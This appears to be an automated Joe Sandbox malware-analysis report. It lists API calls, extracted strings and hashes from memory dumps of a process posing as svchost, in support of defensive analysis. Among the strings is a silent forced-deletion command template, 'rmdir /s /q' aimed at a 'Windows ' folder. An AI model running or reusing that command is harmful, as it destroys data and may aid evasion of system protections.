            • API ID: free$_vsnwprintfmemcpywcschr
            • String ID:
            • API String ID: 1058213626-0
            APIs
            • GetLastError.KERNEL32 ref: 00007FFA41872C4F
            • SetLastError.KERNEL32 ref: 00007FFA41872C6E
            • FlsSetValue.KERNEL32 ref: 00007FFA41872C97
            • FlsSetValue.KERNEL32 ref: 00007FFA41872CA8
            • FlsSetValue.KERNEL32 ref: 00007FFA41872CB9
              • Part of subcall function 00007FFA41872870: HeapFree.KERNEL32(?,?,0E10AC2583480000,00007FFA4188076A,?,?,?,00007FFA41880AE7,?,?,00000000,00007FFA4187F891,?,?,00007FFA4187253A,00007FFA4187F7C3), ref: 00007FFA41872886
              • Part of subcall function 00007FFA41872870: GetLastError.KERNEL32(?,?,0E10AC2583480000,00007FFA4188076A,?,?,?,00007FFA41880AE7,?,?,00000000,00007FFA4187F891,?,?,00007FFA4187253A,00007FFA4187F7C3), ref: 00007FFA41872890
            • SetLastError.KERNEL32 ref: 00007FFA41872CDC
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ErrorLast$Value$FreeHeap
            • String ID:
            • API String ID: 365477584-0
            APIs
            • pthread_mutexattr_init.LIBWINPTHREAD-1 ref: 68285DC2
            • pthread_mutexattr_settype.LIBWINPTHREAD-1 ref: 68285DE8
            • pthread_mutex_init.LIBWINPTHREAD-1 ref: 68285DFA
            • pthread_mutexattr_destroy.LIBWINPTHREAD-1 ref: 68285E09
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: pthread_mutex_initpthread_mutexattr_destroypthread_mutexattr_initpthread_mutexattr_settype
            • String ID:
            • API String ID: 3045616983-0
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: Connection is not open.$SELECT * FROM report_process_table$_name
            • API String ID: 3668304517-2728671282
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: " not used$AlgorithmParametersBase: parameter "
            • API String ID: 3668304517-612349224
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$DirectoryWindows
            • String ID: C:\
            • API String ID: 2156477447-3404278061
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$DirectoryWindows
            • String ID: C:\
            • API String ID: 2156477447-3404278061
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: Hex string has an odd length.$invalid stoi argument$stoi argument out of range
            • API String ID: 3668304517-2380746493
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
            • API String ID: 2943138195-757766384
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: NameName::
            • String ID: `template-parameter$void
            • API String ID: 1333004437-4057429177
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: getenv
            • String ID: LANG$LC_ALL
            • API String ID: 498649692-1846429067
            APIs
            • GetSystemTimeAsFileTime.KERNEL32 ref: 6828C8A5
            • GetCurrentProcessId.KERNEL32 ref: 6828C8B0
            • GetCurrentThreadId.KERNEL32 ref: 6828C8B9
            • GetTickCount.KERNEL32 ref: 6828C8C1
            • QueryPerformanceCounter.KERNEL32 ref: 6828C8CE
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
            • String ID:
            • API String ID: 1445889803-0
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: memcpystrlen$mallocstrcmp
            • String ID:
            • API String ID: 1163645620-0
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in char
            • API String ID: 4097890229-960316848
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in char
            • API String ID: 4097890229-960316848
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in char
            • API String ID: 4097890229-960316848
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in wchar_t
            • API String ID: 4097890229-1689078516
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in wchar_t
            • API String ID: 4097890229-1689078516
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in wchar_t
            • API String ID: 4097890229-1689078516
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: integral cannot be stored in char
            • API String ID: 909987262-960316848
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID: UTF-16LEUNICODE$UTF-8$ccs
            • API String ID: 3215553584-1196891531
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: __std_exception_destroy
            • String ID: object separator
            • API String ID: 2453523683-3540986906
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: __std_exception_destroy$_invalid_parameter_noinfo_noreturn
            • String ID: [json.exception.
            • API String ID: 2506729964-791563284
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: __std_exception_destroy
            • String ID: value
            • API String ID: 2453523683-494360628
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: false$true
            • API String ID: 3668304517-2658103896
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: false$true
            • API String ID: 3668304517-2658103896
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: : transaction is already closed.$Could not execute command $command
            • API String ID: 3668304517-2266251152
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: exists$rmdir /s /q "{}Windows \"
            APIs
              • Part of subcall function 00007FFA4184D3D0: __std_exception_copy.LIBVCRUNTIME ref: 00007FFA4184D409
              • Part of subcall function 00007FFA41853F98: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41853FE8
              • Part of subcall function 00007FFA41853F98: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41854029
            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA4184BF54
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ExceptionFileHeaderRaise__std_exception_copy_invalid_parameter_noinfo_noreturn
            • String ID: while $Could not copy string: buffer too small. $Started new
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
            • String ID: bad locale name
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
            • String ID: bad locale name
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: PRINTF_EXPONENT_DIGITS$gfff$gfff
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: PRINTF_EXPONENT_DIGITS$gfff$gfff
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: AES$CBC
            APIs
            • #14.LIBPQ(?,?,?,?,?,?,?,?,?,?,00000000,00007FFA418488BE), ref: 00007FFA41848178
              • Part of subcall function 00007FFA4184D310: __std_exception_copy.LIBVCRUNTIME ref: 00007FFA4184D349
              • Part of subcall function 00007FFA41853F98: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41853FE8
              • Part of subcall function 00007FFA41853F98: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41854029
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ExceptionFileHeaderRaise__std_exception_copy
            • String ID: Could not obtain client encoding.$Lost connection to the database server.$No connection to database
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: _Jv_RegisterClasses$libgcj-16.dll
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: _get_output_format$msvcrt.dll
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: freememcpy$malloc
            • String ID:
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: freemallocmemcpy
            • String ID:
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Module$FileHandleName
            • String ID:
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: FileWrite$ConsoleErrorLastOutput
            • String ID:
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID:
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
            • String ID:
            APIs
            • IsDBCSLeadByteEx.KERNEL32 ref: 682948ED
            • MultiByteToWideChar.KERNEL32 ref: 6829492D
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: Byte$CharLeadMultiWide
            • String ID:
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+$Replicator::operator[]
            • String ID:
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: free$fputwc
            • String ID:
            • API String ID: 150244592-0
            • Opcode ID: c2c6b2484b39b49a0fcfee41523438bffa445ebd70cdf74e54fd19da28add474
            • Instruction ID: 244aee1e114e4195e8fd06e4147dcd36d29585405f5c3d7b400b3649f65df6d3
            • Opcode Fuzzy Hash: c2c6b2484b39b49a0fcfee41523438bffa445ebd70cdf74e54fd19da28add474
            • Instruction Fuzzy Hash: 691129D670815D44EE245B2AB9543BA5250AB48BE8FC8423CDE79477E8EF38C5CA8200
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ByteCharErrorLastMultiWide
            • String ID:
            • API String ID: 203985260-0
            • Opcode ID: 64999ac49b64f57510a9083063b03a6e1ec37baec4128496d2f109a880320f1d
            • Instruction ID: a55e2fdc170529db38dedee358564f5f23f5f207a37c207605f4803949a82586
            • Opcode Fuzzy Hash: 64999ac49b64f57510a9083063b03a6e1ec37baec4128496d2f109a880320f1d
            • Instruction Fuzzy Hash: B4218E72A2CB9187E3119F26E44431EB6B4F789B94F204139EB8C53B64DF3DE4458B00
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: _errnofreefwritestrchr
            • String ID:
            • API String ID: 2662193495-0
            • Opcode ID: 3774e2090c633a3656ab33327e8cec294d0beb47fd11ff2b83d8f3812c8ee8ce
            • Instruction ID: bc084c77e099cd1f26941faf66af064652f81373628a2ae5a35925b9f4d5070e
            • Opcode Fuzzy Hash: 3774e2090c633a3656ab33327e8cec294d0beb47fd11ff2b83d8f3812c8ee8ce
            • Instruction Fuzzy Hash: DE012B96B0825801ED256A5AB9103B986416B49FE4FC843315E3D5B7D5EE28C8868740
            APIs
            • GetFileInformationByHandleEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA41850122,?,?,?,00007FFA417E1F1B), ref: 00007FFA4184F9F0
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA41850122,?,?,?,00007FFA417E1F1B), ref: 00007FFA4184F9FE
            • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA41850122,?,?,?,00007FFA417E1F1B), ref: 00007FFA4184FA16
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: FileHandleInformation$ErrorLast
            • String ID:
            • API String ID: 3070998852-0
            • Opcode ID: 80ee385592e1c2362f41280c714180647f26becde0ff447e63500211ae9f45ae
            • Instruction ID: 7aa2e43b8cb3c7be36dbe64016fe6ad4167529ab81b27d8e95b0855442cb23e4
            • Opcode Fuzzy Hash: 80ee385592e1c2362f41280c714180647f26becde0ff447e63500211ae9f45ae
            • Instruction Fuzzy Hash: 60015B31B1CA8285EB52EB65E48012973A0AF4ABD8F60C536DA4D87775EF3CF0458750
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
            • String ID:
            • API String ID: 2933794660-0
            • Opcode ID: 28632ec2a6c63f9a940f5863fbf2c4d3ea3e85bb70d54b4bccaee4de545314a5
            • Instruction ID: e7e79a1d82fc3f210508989780158d11b132ee403b51c276e50a8ea87cf88a75
            • Opcode Fuzzy Hash: 28632ec2a6c63f9a940f5863fbf2c4d3ea3e85bb70d54b4bccaee4de545314a5
            • Instruction Fuzzy Hash: 87110026B1CF0189EB41DFA0E8552B833A4F75AB68F441E35DA6D877A4EF7CE1548340
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ErrorFileHandleInformationLast
            • String ID:
            • API String ID: 275135790-0
            • Opcode ID: 89ee6a502986ecef42c32a4557c4fa67c18ab72e849ee833ed5afb4ed2bb79ab
            • Instruction ID: 608005dc378cc7afd156fd2349d1c13457dbf31ff54a9bdca53f4809a56d6871
